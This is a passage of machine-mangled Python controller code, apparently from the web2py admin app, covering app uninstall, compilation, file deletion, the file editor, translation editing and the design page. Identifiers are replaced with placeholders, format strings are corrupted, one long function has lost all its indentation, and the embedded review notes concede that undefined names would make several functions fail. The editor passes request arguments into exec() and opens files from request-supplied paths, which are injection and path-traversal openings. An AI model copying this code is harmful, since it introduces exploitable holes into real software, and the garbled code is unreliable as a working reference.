            session.flash = T('unable to upgrade because "%s"', VAR_125)
        redirect(URL('site'))
    # was: VAR_46=dialog -- `dialog` was an undefined name
    return dict(VAR_46=VAR_46)
def FUNC_17():
    """Uninstall an application after confirmation, with permission checks."""
    VAR_3 = FUNC_5()
    VAR_46 = FORM.confirm(T('Uninstall'),
                          {T('Cancel'): URL('site')})
    VAR_46['_id'] = 'confirm_form'
    VAR_46['_class'] = 'well'
    for VAR_126 in VAR_46.components:
        VAR_126['_class'] = 'btn'
    if VAR_46.accepted:
        if MULTI_USER_MODE:
            if is_manager() and db(db.app.name == VAR_3).delete():
                pass
            elif db(db.app.name == VAR_3)(db.app.owner == auth.user.id).delete():
                pass
            else:
                session.flash = T('no permission to FUNC_17 "%s"', VAR_3)
                redirect(URL('site'))
        try:
            # pack a backup copy before removing the application
            VAR_5 = app_pack(VAR_3, request, raise_ex=True)
        except:
            session.flash = T('unable to FUNC_17 "%s"', VAR_3)
        else:
            if app_uninstall(VAR_3, request):
                session.flash = T('application "%s" uninstalled', VAR_3)
            else:
                session.flash = T('unable to FUNC_17 "%s"', VAR_3)
        redirect(URL('site'))
    # was: VAR_46=dialog -- `dialog` was an undefined name
    return dict(VAR_3=VAR_3, VAR_46=VAR_46)
def FUNC_18():
    """Clean the app's cache/errors/sessions folders, then reload the site."""
    VAR_3 = FUNC_5()
    VAR_47 = app_cleanup(VAR_3, request)
    if not VAR_47:
        session.flash = T("some VAR_45 could not be removed")
    else:
        session.flash = T('cache, FUNC_42 and sessions cleaned')
    redirect(URL('site'))
def FUNC_19():
    """Byte-compile the application, reporting any views that failed."""
    VAR_3 = FUNC_5()
    VAR_48 = app_compile(VAR_3, request,
                         skip_failed_views=(request.args(1) == 'skip_failed_views'))
    # app_compile returns falsy on success, a list of failed views when
    # skipping was requested, or an error string otherwise
    if not VAR_48:
        session.flash = T('application compiled')
    elif isinstance(VAR_48, list):
        session.flash = DIV(*[T('application compiled'), BR(), BR(),
                              T('WARNING: The following VAR_84 could not be compiled:'), BR()] +
                            [CAT(BR(), VAR_182) for VAR_182 in VAR_48] +
                            [BR(), BR(), T('DO NOT use the "Pack compiled" feature.')])
    else:
        session.flash = DIV(T('Cannot compile: there are FUNC_42 in your VAR_3:'),
                            CODE(VAR_48))
    redirect(URL('site'))
def FUNC_20():
    """Remove the application's compiled bytecode files."""
    VAR_3 = FUNC_5()
    remove_compiled_application(apath(VAR_3, VAR_122=request))
    session.flash = T('compiled application removed')
    redirect(URL('site'))
def FUNC_21():
    """Delete a file after user confirmation, logging the removal."""
    VAR_3 = FUNC_5()
    VAR_5 = '/'.join(request.args)
    VAR_49 = request.vars.sender
    if isinstance(VAR_49, list):  # ## fix VAR_7 problem with Vista
        # was: sender[0] -- `sender` was an undefined name
        VAR_49 = VAR_49[0]
    VAR_46 = FORM.confirm(T('Delete'),
                          {T('Cancel'): URL(VAR_49, VAR_157=request.vars.id)})
    if VAR_46.accepted:
        try:
            VAR_177 = apath(VAR_5, VAR_122=request)
            VAR_160 = FUNC_0(open(VAR_177, 'r').read())
            os.unlink(VAR_177)
            # log a negative line delta for the removed file
            FUNC_1(VAR_3, 'DELETE', VAR_5, VAR_6=-VAR_160)
            # was: dict(VAR_5=filename) -- `filename` was an undefined name
            session.flash = T('file "%(VAR_5)s" deleted',
                              dict(VAR_5=VAR_5))
        except Exception:
            session.flash = T('unable to FUNC_21 VAR_16 "%(VAR_5)s"',
                              dict(VAR_5=VAR_5))
        redirect(URL(VAR_49, VAR_157=request.vars.id2))
    return dict(VAR_46=VAR_46, VAR_5=VAR_5)
def FUNC_22():
    """Toggle an application's DISABLED marker file (signed URL required)."""
    if not URL.verify(request, hmac_key=session.hmac_key): raise HTTP(401)
    VAR_3 = FUNC_5()
    VAR_5 = os.path.join(apath(VAR_3, VAR_122=request), 'DISABLED')
    if is_gae:
        return SPAN(T('Not supported'), _style='color:yellow')
    elif os.path.exists(VAR_5):
        # marker present -> app was disabled; remove it to re-enable
        os.unlink(VAR_5)
        return SPAN(T('Disable'), _style='color:green')
    else:
        if PY2:
            FUNC_2(VAR_5, 'wb').write('disabled: True\ntime-disabled: %s' % request.now)
        else:
            # py3: binary mode needs explicit encoding of the marker text
            VAR_200 = 'disabled: True\ntime-disabled: %s' % request.now
            FUNC_2(VAR_5, 'wb').write(VAR_200.encode('utf-8'))
        return SPAN(T('Enable'), _style='color:red')
def FUNC_23():
    """Return a file's contents and extension for the source viewer."""
    VAR_3 = FUNC_5(request.vars.app)
    VAR_5 = '/'.join(request.args)
    if request.vars.app:
        VAR_15 = abspath(VAR_5)
    else:
        VAR_15 = apath(VAR_5, VAR_122=request)
    try:
        VAR_2 = FUNC_3(VAR_15).replace('\r', '')
    except IOError:
        session.flash = T('file does not exist')
        redirect(URL('site'))
    # was: VAR_5[filename.rfind(...)] -- `filename` was an undefined name
    VAR_50 = VAR_5[VAR_5.rfind('.') + 1:].lower()
    # was: app/filename/data/extension -- all undefined names
    return dict(VAR_3=VAR_3,
                VAR_5=VAR_5,
                VAR_2=VAR_2,
                VAR_50=VAR_50)
def FUNC_24():
    """List the application's controller files (default filter: *.py)."""
    VAR_3 = FUNC_5()
    if len(request.args) > 1:
        VAR_16 = request.args[1]
    else:
        VAR_16 = '.*\.py'
    # '%s' and the 'controllers' folder name restored from the mangled string
    VAR_51 = listdir(
        apath('%s/controllers/' % VAR_3, VAR_122=request), VAR_16 + '$')
    # was: VAR_51=controllers -- `controllers` was an undefined name
    return dict(VAR_3=VAR_3, VAR_51=VAR_51)
def FUNC_25():
    """Placeholder endpoint: always responds with an empty string."""
    return ''
def FUNC_26():
    """Search app sources for a keyword; return the matching files as JSON."""
    VAR_52 = request.vars.keywords or ''
    VAR_3 = FUNC_5()
    def FUNC_59(VAR_5, VAR_52):
        # True when the keyword occurs anywhere in the given file
        VAR_5 = os.path.join(apath(VAR_3, VAR_122=request), VAR_5)
        if VAR_52 in read_file(VAR_5, 'r'):
            return True
        return False
    VAR_15 = apath(request.args[0], VAR_122=request)
    VAR_53 = glob(os.path.join(VAR_15, '*/*.py'))
    VAR_54 = glob(os.path.join(VAR_15, '*/*.html'))
    VAR_55 = glob(os.path.join(VAR_15, '*/*/*.html'))
    VAR_45 = [x[len(VAR_15) + 1:].replace(
        '\\', '/') for x in VAR_53 + VAR_54 + VAR_55 if FUNC_59(x, VAR_52)]
    # was: VAR_45=files -- undefined name; '%s' restored in the message
    return VAR_43.json(dict(VAR_45=VAR_45, message=T.M('Searching: **%s** %%{VAR_16}', len(VAR_45))))
def FUNC_27():
VAR_3 = FUNC_5(request.vars.app)
VAR_56 = apath(VAR_3, VAR_122=request)
VAR_57 = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
VAR_58 = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor', default_values={})
VAR_57.update(VAR_58.read())
if not(request.ajax) and not(is_mobile):
VAR_43.title = T('Editing %s') % VAR_3
return VAR_43.render('default/FUNC_27.html', dict(VAR_3=VAR_3, editor_settings=VAR_57))
if 'settings' in request.vars:
if request.post_vars: # save new VAR_57
if PY2:
VAR_201 = request.post_vars.items()
else:
VAR_201 = list(request.post_vars.items())
VAR_201 += [(opt, 'false') for opt in VAR_57 if opt not in request.post_vars]
if VAR_58.save(VAR_201):
VAR_43.headers["web2py-VAR_126-flash"] = T('Preferences saved correctly')
else:
VAR_43.headers["web2py-VAR_126-flash"] = T('Preferences saved on session only')
VAR_43.headers["web2py-VAR_126-command"] = "update_editor(%VAR_140);$('a[href=#editor_settings] button.close').click();" % VAR_43.json(VAR_58.read())
return
else:
VAR_178 = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
VAR_178['plain_html'] = VAR_43.render('default/editor_settings.html', {'editor_settings': VAR_57})
return VAR_43.json(VAR_178)
""" File FUNC_27 handler """
VAR_3 = FUNC_5(request.vars.app)
VAR_5 = '/'.join(request.args)
VAR_59 = request.args[-1]
if request.vars.app:
VAR_15 = abspath(VAR_5)
else:
VAR_15 = apath(VAR_5, VAR_122=request)
if VAR_5[-3:] == '.py':
VAR_127 = 'python'
elif VAR_5[-5:] == '.html':
VAR_127 = 'html'
elif VAR_5[-5:] == '.load':
VAR_127 = 'html'
elif VAR_5[-4:] == '.css':
VAR_127 = 'css'
elif VAR_5[-3:] == '.js':
VAR_127 = 'javascript'
else:
VAR_127 = 'html'
if ('revert' in request.vars) and os.path.exists(VAR_15 + '.bak'):
try:
VAR_2 = FUNC_3(VAR_15 + '.bak')
VAR_179 = FUNC_3(VAR_15)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return VAR_43.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
FUNC_4(VAR_15, VAR_2)
VAR_128 = md5_hash(VAR_2)
VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
FUNC_4(VAR_15 + '.bak', VAR_179)
VAR_43.flash = T('file "%s" of %VAR_140 restored', (VAR_5, VAR_129))
else:
try:
VAR_2 = FUNC_3(VAR_15)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return VAR_43.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
VAR_130 = FUNC_0(VAR_2)
VAR_128 = md5_hash(VAR_2)
VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
if request.vars.file_hash and request.vars.file_hash != VAR_128:
session.flash = T('file changed on disk')
VAR_2 = request.vars.data.replace('\VAR_122\n', '\n').strip() + '\n'
FUNC_4(VAR_15 + '.1', VAR_2)
if 'from_ajax' in request.vars:
return VAR_43.json({'error': str(T('file changed on disk')),
'redirect': URL('resolve',
VAR_98=request.args)})
else:
redirect(URL('resolve', VAR_98=request.args))
elif request.vars.data:
FUNC_4(VAR_15 + '.bak', VAR_2)
VAR_2 = request.vars.data.replace('\VAR_122\n', '\n').strip() + '\n'
FUNC_4(VAR_15, VAR_2)
VAR_202 = FUNC_0(VAR_2)
FUNC_1(
VAR_3, 'EDIT', VAR_5, VAR_6=VAR_202 - VAR_130)
VAR_128 = md5_hash(VAR_2)
VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
VAR_43.flash = T('file saved on %s', VAR_129)
VAR_60 = (request.vars.data or request.vars.revert)
VAR_61 = None
if VAR_127 == 'python' and request.vars.data:
import _ast
try:
VAR_180 = request.vars.data.rstrip().replace('\VAR_122\n', '\n') + '\n'
compile(VAR_180, VAR_15, "exec", _ast.PyCF_ONLY_AST)
except Exception as VAR_114:
VAR_203 = sum([len(VAR_69) + 1 for l, VAR_69
in enumerate(request.vars.data.split("\n"))
if l < VAR_114.lineno - 1])
if VAR_114.text and VAR_114.offset:
VAR_213 = VAR_114.offset - (len(VAR_114.text) - len(
VAR_114.text.splitlines()[-1]))
else:
VAR_213 = 0
VAR_61 = {'start': VAR_203, 'end': VAR_203 +
VAR_213 + 1, 'lineno': VAR_114.lineno, 'offset': VAR_213}
try:
VAR_214 = VAR_114.__class__.__name__
except:
VAR_214 = 'unknown exception!'
VAR_43.flash = DIV(T('failed to compile VAR_16 because:'), BR(),
B(VAR_214), ' ' + T('at VAR_69 %s', VAR_114.lineno),
VAR_213 and ' ' +
T('at char %s', VAR_213) or '',
PRE(repr(VAR_114)))
if VAR_60 and request.args[1] == 'modules':
try:
VAR_181 = '.'.join(request.args[2:])[:-3]
exec('import .applications.%VAR_140.modules.%s' % (
request.args[0], VAR_181))
reload(sys.modules['applications.%VAR_140.modules.%s'
% (request.args[0], VAR_181)])
except Exception as VAR_114:
VAR_43.flash = DIV(
T('failed to reload module because:'), PRE(repr(VAR_114)))
VAR_62 = None
VAR_63 = None
VAR_64 = None
if VAR_127 == 'html' and len(request.args) >= 3:
VAR_131 = os.path.join(request.args[0], 'controllers',
request.args[2] + '.py')
if os.path.exists(apath(VAR_131, VAR_122=request)):
VAR_62 = URL('edit', VAR_98=[VAR_131.replace(os.sep, "/")])
VAR_182 = request.args[3].replace('.html', '')
VAR_64 = URL(request.args[0], request.args[2], VAR_182)
elif VAR_127 == 'python' and request.args[1] == 'controllers':
VAR_3 = FUNC_5()
VAR_183 = os.path.splitext(request.args[2])[0]
VAR_184 = os.path.join(VAR_3, 'views', VAR_183)
VAR_185 = apath(VAR_184, VAR_122=request)
VAR_186 = []
if os.path.exists(VAR_185):
if os.path.isdir(VAR_185):
VAR_186 = glob(os.path.join(VAR_185, '*.html'))
elif os.path.exists(VAR_185 + '.html'):
VAR_186.append(VAR_185 + '.html')
if len(VAR_186):
VAR_63 = []
for v in sorted(VAR_186):
VAR_215 = os.path.split(v)[-1]
VAR_216 = "/".join([VAR_184.replace(os.sep, "/"), VAR_215])
VAR_63.append(A(VAR_215.split(".")[0],
VAR_144="editor_filelink",
_href=URL('edit', VAR_98=[VAR_216])))
if len(request.args) > 2 and request.args[1] == 'controllers':
VAR_132 = (request.args[2])[:-3]
try:
VAR_83 = find_exposed_functions(VAR_2)
VAR_83 = functions and sorted(VAR_83) or []
except SyntaxError as err:
VAR_83 = ['SyntaxError:Line:%d' % err.lineno]
else:
(VAR_132, VAR_83) = (None, None)
if 'from_ajax' in request.vars:
return VAR_43.json({'file_hash': VAR_128, 'saved_on': VAR_129, 'functions': VAR_83, 'controller': VAR_132, 'application': request.args[0], 'highlight': VAR_61})
else:
VAR_133 = dict(VAR_3=request.args[0],
VAR_160=request.vars.lineno or 1,
editor_settings=VAR_57,
VAR_5=filename,
VAR_59=realfilename,
VAR_127=filetype,
VAR_2=data,
VAR_62=edit_controller,
VAR_128=file_hash,
VAR_129=saved_on,
VAR_132=controller,
VAR_83=functions,
VAR_64=view_link,
VAR_63=editviewlinks,
id=IS_SLUG()(VAR_5)[0],
force=True if (request.vars.restore or
request.vars.revert) else False)
VAR_134 = VAR_43.render('default/edit_js.html', VAR_133)
file_details['plain_html'] = VAR_134
if is_mobile:
return VAR_43.render('default.mobile/FUNC_27.html',
VAR_133, editor_settings=VAR_57)
else:
return VAR_43.json(VAR_133)
def FUNC_28():
    """Scan an application's source folders for TODO-style comments.

    Walks models/controllers/modules/private, reads each non-backup .py
    file, and collects every regex match (pattern looks like a mangled
    '#\\s*(todo)+\\s+(.*)' — verify) with its 1-based line number.
    Returns {'todo': [{'filename', 'matches', 'dir'}, ...], 'app': app}.

    NOTE(review): identifiers are machine-mangled. The format string
    '%(VAR_3)s' % {'app': VAR_3} would raise KeyError at runtime —
    presumably originally '%(app)s'; confirm against upstream source.
    Relies on web2py globals (request, apath, listdir) and helpers
    FUNC_2 (open) / FUNC_38 defined here.
    """
    VAR_3 = request.vars.app or ''
    VAR_56 = apath('%(VAR_3)s' % {'app': VAR_3}, VAR_122=request)
    VAR_65 = ['models', 'controllers', 'modules', 'private']
    def FUNC_38(VAR_3, VAR_13, VAR_14='.*\.py$'):
        # List files in app/dir matching the regex, normalized to '/'
        # separators, excluding editor backups (*.bak).
        VAR_45 = sorted(listdir(apath('%(VAR_3)VAR_140/%(VAR_13)VAR_140/' % {'app': VAR_3, 'dir': VAR_13}, VAR_122=request), VAR_14))
        VAR_45 = [x.replace(os.path.sep, '/') for x in VAR_45 if not x.endswith('.bak')]
        return VAR_45
    VAR_66 = '#\VAR_140*(todo)+\VAR_140+(.*)'
    VAR_32 = re.compile(VAR_66, re.IGNORECASE)
    VAR_67 = []
    for VAR_68 in VAR_65:
        for VAR_221 in FUNC_38(VAR_3, VAR_68):
            VAR_35 = []
            VAR_5 = apath(os.path.join(VAR_3, VAR_68, VAR_221), VAR_122=request)
            with FUNC_2(VAR_5, 'r') as f_s:
                VAR_204 = f_s.read()
            for VAR_156 in VAR_32.finditer(VAR_204):
                VAR_203 = VAR_156.start()
                # Line number = newlines before the match start, plus one.
                VAR_160 = VAR_204.count('\n', 0, VAR_203) + 1
                VAR_35.append({'text': VAR_156.group(0), 'lineno': VAR_160})
            if len(VAR_35) != 0:
                VAR_67.append({'filename': VAR_221, 'matches': VAR_35, 'dir': VAR_68})
    return {'todo': VAR_67, 'app': VAR_3}
def FUNC_29():
    """Persist a named editor session (comma-joined file list) into
    settings.cfg under [editor_sessions], then render the session page.

    Sets a 'web2py-...-flash' response header to report whether the save
    hit the config file or only the in-memory session.
    NOTE(review): VAR_43 is presumably the web2py `response` object;
    header name contains a mangled token (VAR_126) — confirm upstream.
    """
    VAR_58 = Config(os.path.join(request.folder, 'settings.cfg'),
                    section='editor_sessions', default_values={})
    VAR_57 = VAR_58.read()
    if request.vars.session_name and request.vars.files:
        VAR_135 = request.vars.session_name
        VAR_45 = request.vars.files
        VAR_57.update({VAR_135: ','.join(VAR_45)})
        if VAR_58.save(VAR_57.items()):
            VAR_43.headers["web2py-VAR_126-flash"] = T('Session saved correctly')
        else:
            VAR_43.headers["web2py-VAR_126-flash"] = T('Session saved on session only')
    return VAR_43.render('default/FUNC_29.html', {'editor_sessions': VAR_57})
def FUNC_30():
    """Resolve a conflict between a file and its '.1' sibling.

    Computes an ndiff between the two versions. On POST, keeps the
    unchanged lines plus any 'line%i' checkboxes the user ticked, writes
    the merge back, and redirects to the editor. On GET, renders the
    diff as a TABLE with per-line checkboxes for added/removed lines.

    NOTE(review): the final `dict(VAR_139=diff, VAR_5=filename)` uses
    undefined names `diff`/`filename` — mangling artifacts; originally
    presumably the local diff table and filename. Verify upstream.
    """
    VAR_5 = '/'.join(request.args)
    VAR_15 = apath(VAR_5, VAR_122=request)
    VAR_7 = FUNC_3(VAR_15).split('\n')
    try:
        VAR_8 = FUNC_3(VAR_15 + '.1').split('\n')
    except IOError:
        session.flash = 'Other VAR_16, no longer there'
        redirect(URL('edit', VAR_98=request.args))
    VAR_68 = difflib.ndiff(VAR_7, VAR_8)
    def FUNC_60(VAR_69):
        # Render the line's leading whitespace so indentation survives HTML.
        VAR_136 = ''
        for (VAR_145, VAR_48) in enumerate(VAR_69):
            if VAR_48 == ' ':
                VAR_136 += ' '
            elif VAR_48 == ' \t':
                VAR_136 += ' '
            elif VAR_145 == 0 and VAR_48 == '?':
                pass
            else:
                break
        return XML(VAR_136)
    def FUNC_61(VAR_70):
        # CSS class from the ndiff marker: ' ' / '+' / '-'.
        VAR_137 = {' ': 'normal', '+': 'plus', '-': 'minus'}
        return VAR_137[VAR_70[0]]
    if request.vars:
        # Merge: keep context lines and any user-selected +/- lines.
        VAR_48 = '\n'.join([VAR_70[2:].rstrip() for (VAR_111, VAR_70) in enumerate(VAR_68) if VAR_70[0]
                            == ' ' or 'line%i' % VAR_111 in request.vars])
        FUNC_4(VAR_15, VAR_48)
        session.flash = 'files merged'
        redirect(URL('edit', VAR_98=request.args))
    else:
        VAR_138 = lambda VAR_197, VAR_70: not VAR_70[:1] in ['+', '-'] and "" \
            or INPUT(_type='checkbox',
                     _name='line%i' % VAR_197,
                     VAR_9=VAR_70[0] == '+')
        VAR_139 = TABLE(*[TR(TD(VAR_138(VAR_111, VAR_70)),
                             TD(VAR_70[0]),
                             TD(FUNC_60(VAR_70[2:]),
                                TT(VAR_70[2:].rstrip())),
                             VAR_144=FUNC_61(VAR_70))
                          for (VAR_111, VAR_70) in enumerate(VAR_68) if VAR_70[0] != '?'])
        return dict(VAR_139=diff, VAR_5=filename)
def FUNC_31():
    """Edit a web2py translation dictionary file.

    Builds a FORM with one input/textarea per translation key (keyed by
    md5 of the key); on accept, writes back all values except those set
    to chr(127) (the 'delete' sentinel) via write_dict, then redirects.

    NOTE(review): several names are undefined in this scope and look
    like mangling artifacts: `filename`, `form`, `rows` (used before
    VAR_73 is populated), `key.partition`, `_class`. Verify against the
    original web2py admin controller before editing further.
    """
    VAR_3 = FUNC_5()
    VAR_5 = '/'.join(request.args)
    VAR_43.title = request.args[-1]
    VAR_71 = read_dict(apath(VAR_5, VAR_122=request))
    if '__corrupted__' in VAR_71:
        VAR_26 = SPAN(VAR_71['__corrupted__'], VAR_144='error')
        return dict(VAR_5=filename, VAR_26=form)
    VAR_72 = sorted(VAR_71.keys(), VAR_143=lambda x: to_native(x).lower())
    VAR_73 = []
    rows.append(H2(T('Original/Translation')))
    for VAR_143 in VAR_72:
        VAR_10 = md5_hash(VAR_143)
        VAR_140 = VAR_71[VAR_143]
        # '\x01' separates an optional filter tag prefix from the key.
        (VAR_141, VAR_142, VAR_143) = key.partition('\x01')
        if VAR_142:
            VAR_141 = SPAN(VAR_141 + ': ', VAR_144='tm_ftag')
            VAR_145 = VAR_143
        else:
            (VAR_145, VAR_141) = (VAR_141, '')
        VAR_144 = 'untranslated' if VAR_145 == VAR_140 else 'translated'
        # Short values get a text input; long ones a textarea.
        if len(VAR_140) <= 40:
            VAR_187 = INPUT(_type='text', _name=VAR_10, VAR_9=VAR_140,
                            _size=70, VAR_144=_class)
        else:
            VAR_187 = TEXTAREA(_name=VAR_10, VAR_9=VAR_140, _cols=70,
                               _rows=5, VAR_144=_class)
        VAR_145 = (VAR_140 != VAR_145) and VAR_145 or B(VAR_145)
        VAR_146 = DIV(LABEL(VAR_141, VAR_145, _style="font-weight:normal;"),
                      CAT(VAR_187, '\n', TAG.BUTTON(
                          T('delete'),
                          _onclick='return delkey("%s")' % VAR_10,
                          VAR_144='btn')), _id=VAR_10, VAR_144='span6 well well-small')
        VAR_73.append(DIV(VAR_146, VAR_144="row-fluid"))
    VAR_73.append(DIV(INPUT(_type='submit', _value=T('update'), VAR_144="btn btn-primary"), VAR_144='controls'))
    VAR_26 = FORM(*VAR_73)
    if VAR_26.accepts(request.vars, keepvalues=True):
        VAR_147 = dict()
        for VAR_143 in VAR_72:
            VAR_10 = md5_hash(VAR_143)
            # chr(127) marks a key the user deleted client-side; skip it.
            if VAR_26.vars[VAR_10] == chr(127):
                continue
            VAR_147[VAR_143] = VAR_26.vars[VAR_10]
        write_dict(apath(VAR_5, VAR_122=request), VAR_147)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(VAR_122=request, VAR_98=request.args))
    return dict(VAR_3=request.args[0], VAR_5=filename, VAR_26=form)
def FUNC_32():
    """Edit a web2py plural-forms dictionary file.

    For each singular key, shows nplurals-1 text inputs (one per plural
    form); on accept, writes values back via write_plural_dict unless
    the first form equals chr(127) (the delete sentinel).

    NOTE(review): uses Python-2-only builtins (xrange, unicode, cmp and
    a cmp-style sorted() call) — this block cannot run on Python 3 as
    written. `filename`/`form` in the return dicts are undefined here
    (mangling artifacts). Verify against the original source.
    """
    VAR_3 = FUNC_5()
    VAR_5 = '/'.join(request.args)
    VAR_74 = read_plural_dict(
        apath(VAR_5, VAR_122=request)) # plural forms dictionary
    VAR_75 = int(request.vars.nplurals) - 1 # number of plural forms
    VAR_76 = xrange(VAR_75)
    if '__corrupted__' in VAR_74:
        VAR_26 = SPAN(VAR_74['__corrupted__'], VAR_144='error')
        return dict(VAR_5=filename, VAR_26=form)
    VAR_72 = sorted(VAR_74.keys(), lambda x, y: cmp(
        unicode(x, 'utf-8').lower(), unicode(y, 'utf-8').lower()))
    VAR_77 = []
    for VAR_143 in VAR_72:
        VAR_10 = md5_hash(VAR_143)
        VAR_148 = VAR_74[VAR_143]
        # Pad the stored list with None up to the requested plural count.
        if len(VAR_148) < VAR_75:
            VAR_148.extend(None for VAR_111 in xrange(VAR_75 - len(VAR_148)))
        VAR_149 = DIV(CAT(LABEL(T("Singular Form")), B(VAR_143,
                                                       VAR_144='fake-input')))
        VAR_150 = [SPAN(LABEL(T("Plural Form #%s", VAR_173 + 1)), INPUT(_type='text', _name=VAR_10 + '_' + str(VAR_173), VAR_9=VAR_148[VAR_173], _size=20), VAR_144='span6') for VAR_173 in VAR_76]
        VAR_151 = DIV(CAT(*VAR_150))
        VAR_152 = DIV(CAT(LABEL(XML(' ')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % VAR_10, VAR_144='btn'), VAR_144='span6'))
        VAR_153 = DIV(DIV(VAR_149, '\n', VAR_151, '\n', VAR_152, VAR_144='well well-small'), _id=VAR_10, VAR_144='row-fluid tab_row')
        VAR_77.append(VAR_153)
    VAR_77.append(DIV(TAG['button'](T('update'), _type='submit',
                                    VAR_144='btn btn-primary'),
                      VAR_144='controls'))
    VAR_78 = DIV(*VAR_77, **dict(VAR_144="row-fluid"))
    VAR_26 = FORM(VAR_78)
    if VAR_26.accepts(request.vars, keepvalues=True):
        VAR_154 = dict()
        for VAR_143 in VAR_72:
            VAR_10 = md5_hash(VAR_143)
            # chr(127) in the first form marks a deleted key; skip it.
            if VAR_26.vars[VAR_10 + '_0'] == chr(127):
                continue
            VAR_154[VAR_143] = [VAR_26.vars[VAR_10 + '_' + str(VAR_173)]
                                for VAR_173 in VAR_76]
        write_plural_dict(apath(VAR_5, VAR_122=request), VAR_154)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(VAR_122=request, VAR_98=request.args, VAR_17=dict(
            VAR_75=request.vars.nplurals)))
    return dict(VAR_3=request.args[0], VAR_5=filename, VAR_26=form)
def VAR_79():
    """Render an application's ABOUT and LICENSE files as MARKMIN.

    Reads <app>/ABOUT and <app>/LICENSE via FUNC_3 (a file reader) and
    returns them wrapped in MARKMIN along with FUNC_11(app) — presumably
    a progress/statistics helper; confirm upstream.
    """
    VAR_3 = FUNC_5()
    VAR_79 = FUNC_3(apath('%VAR_140/ABOUT' % VAR_3, VAR_122=request))
    VAR_80 = FUNC_3(apath('%VAR_140/LICENSE' % VAR_3, VAR_122=request))
    return dict(VAR_3=VAR_3, VAR_79=MARKMIN(VAR_79), VAR_80=MARKMIN(VAR_80), VAR_6=FUNC_11(VAR_3))
def FUNC_34():
    """Application 'design' page: inventory of an app's source artifacts.

    Handles plugin-file upload (with a CSRF token check against
    session.token), refuses compiled apps, then lists models (with
    table defines), controllers (with exposed functions), views (with
    extend/include relationships), modules, private files, static files,
    languages, and the cron crontab. Plugin files (plugin_* prefix) are
    split out into a separate list by the FUNC_62 helper.

    NOTE(review): heavily mangled — `models`/`controllers`/`modules`
    are assigned but the subsequent comprehensions read the (undefined)
    VAR_81/VAR_51/VAR_87 names; FUNC_62 augments undefined FUNC_56; the
    return dict references undefined `app`, `defines`, `functions`,
    `extend`, `include`, `languages`, `crontab`. These are renaming
    artifacts; as written the function would raise NameError. Verify
    against the original web2py admin controller.
    """
    VAR_3 = FUNC_5()
    if not VAR_43.flash and VAR_3 == request.application:
        VAR_155 = T('ATTENTION: you cannot FUNC_27 the running application!')
        VAR_43.flash = VAR_155
    # CSRF protection: any POST must carry the session token.
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
        VAR_5 = os.path.basename(request.vars.pluginfile.filename)
        if plugin_install(VAR_3, request.vars.pluginfile.file,
                          request, VAR_5):
            session.flash = T('new VAR_96 installed')
            redirect(URL('design', VAR_98=VAR_3))
        else:
            session.flash = \
                T('unable to install VAR_96 "%s"', VAR_5)
            redirect(URL(VAR_122=request, VAR_98=VAR_3))
    elif isinstance(request.vars.pluginfile, str):
        session.flash = T('plugin not specified')
        redirect(URL(VAR_122=request, VAR_98=VAR_3))
    if os.path.exists(apath('%VAR_140/compiled' % VAR_3, VAR_122=request)):
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))
    models = listdir(apath('%VAR_140/VAR_81/' % VAR_3, VAR_122=request), '.*\.py$')
    VAR_81 = [x.replace('\\', '/') for x in VAR_81]
    VAR_82 = {}
    for VAR_156 in VAR_81:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_81/%s' % (VAR_3, VAR_156), VAR_122=request))
        VAR_82[VAR_156] = re.findall(REGEX_DEFINE_TABLE, VAR_2, re.MULTILINE)
        VAR_82[VAR_156].sort()
    controllers = sorted(
        listdir(apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), '.*\.py$'))
    VAR_51 = [x.replace('\\', '/') for x in VAR_51]
    VAR_83 = {}
    for VAR_48 in VAR_51:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_51/%s' % (VAR_3, VAR_48), VAR_122=request))
        try:
            VAR_95 = find_exposed_functions(VAR_2)
            VAR_83[VAR_48] = VAR_95 and sorted(VAR_95) or []
        except SyntaxError as err:
            VAR_83[VAR_48] = ['SyntaxError:Line:%d' % err.lineno]
    VAR_84 = sorted(
        listdir(apath('%VAR_140/VAR_84/' % VAR_3, VAR_122=request), '[\w/\-]+(\.\w+)+$'))
    VAR_84 = [x.replace('\\', '/') for x in VAR_84 if not x.endswith('.bak')]
    VAR_85 = {}
    VAR_86 = {}
    for VAR_48 in VAR_84:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_84/%s' % (VAR_3, VAR_48), VAR_122=request))
        VAR_95 = re.findall(REGEX_EXTEND, VAR_2, re.MULTILINE)
        if VAR_95:
            VAR_85[VAR_48] = VAR_95[0][1]
        VAR_95 = re.findall(REGEX_INCLUDE, VAR_2)
        VAR_86[VAR_48] = [VAR_111[1] for VAR_111 in VAR_95]
    modules = listdir(apath('%VAR_140/VAR_87/' % VAR_3, VAR_122=request), '.*\.py$')
    VAR_87 = modules = [x.replace('\\', '/') for x in VAR_87]
    modules.sort()
    VAR_88 = listdir(apath('%VAR_140/private/' % VAR_3, VAR_122=request), '[^\.#].*')
    VAR_88 = [x.replace('\\', '/') for x in VAR_88]
    privates.sort()
    VAR_89 = listdir(apath('%VAR_140/static/' % VAR_3, VAR_122=request), '[^\.#].*',
                     maxnum=VAR_1)
    VAR_89 = [x.replace(os.path.sep, '/') for x in VAR_89]
    statics.sort()
    VAR_90 = os.path.join(apath(VAR_3, VAR_122=request), 'languages')
    VAR_91 = dict([(VAR_188, info) for VAR_188, info
